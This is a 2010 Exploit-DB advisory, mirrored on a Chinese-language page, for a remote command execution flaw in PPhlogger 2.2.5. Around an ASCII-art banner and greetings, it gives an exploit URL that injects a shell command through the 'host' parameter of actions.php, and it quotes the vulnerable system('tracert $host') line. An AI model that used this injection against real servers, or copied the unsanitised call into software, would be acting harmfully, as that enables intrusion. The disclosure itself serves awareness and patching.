PPhlogger 2.2.5 – ‘trace.php’ Remote Command Execution

  • 作者: Sn!pEr.S!Te Hacker
    日期: 2010-05-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12766/
  • || || | || 
     o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
     ( : / (_) / ( . 
    +----------------------------------------------------------------------- 
    -+ 
    | ....... | 
    | ..''xxxxxxxxxxxxxxx'... | 
    | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. | 
    | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | 
    | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | 
    | .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. | 
    | .xxxxxxxxxxxxxxxxxx'... ........ .'. | 
    | 'xxxxxxxxxxxxxxx'...... '. | 
    | 'xxxxxxxxxxxxxx'..'x.. .x. | 
    | .xxxxxxxxxxxx'...'.. ... .' | 
    | 'xxxxxxxxx'.. . .. .x. | 
    | xxxxxxx'. .. x. | 
    | xxxx'. .... x x. | 
    | 'x'. ...'xxxxxxx'. x .x. | 
    | .x'. .'xxxxxxxxxxxxxx. '' .' | 
    | .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' | 
    | .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. | 
    | .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' | 
    | .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. | 
    | .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. | 
    | .'xxxxxxx'.... ...xxxxxxx'. | 
    | ..'xxxxx'.. ..xxxxx'.. | 
    | ....'xx'.....''''... |
    +-----------------------------------------------------------------------
    -+
    
    Remote Command Execution Vulnerability
    ========================================================================
    PPhlogger <== 2.2.5(trace.php)
    
    [+] Author : Sn!pEr.S!Te Hacker # 
    # [+] Email : sniper-site@HoTMaiL.coM # 
    # [+] T34M Sn!pEr.S!Te Hacker #
    # [+] 27-5-2010 # 
    # [+] Script :lmage » PPhlogger #
    # [+] Download:http://sourceforge.net/projects/pphlogger/files/pphlogger/2.2.5/pphlogger-2.2.5.zip/download #
    # Version: [2.2.5] #
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
    Exploit : pphlogger/actions.php
    
    http://localhost/pphlogger/actions.php?host= [your command]
    
    http://127.0.0.1/pphlogger/actions.php?host= [your command]
    
    system("tracert $host");
    
    line: 56
    
    web site Favorites my : http://inj3ct0r.com/ & http://www.hack0wn.com/ & http://www.exploit-db.com
    
    
    ================== Greetz : all my friend =================== 
    * PrX Hacker * Sm Hacker * AbUbAdR * mAsH3L ALLiL * saleh Hacker| 
    * HitLer.3rb * QAHER ALRAFDE * DjHacker * Mr.JLD* Mr.koka * Baby Hacker |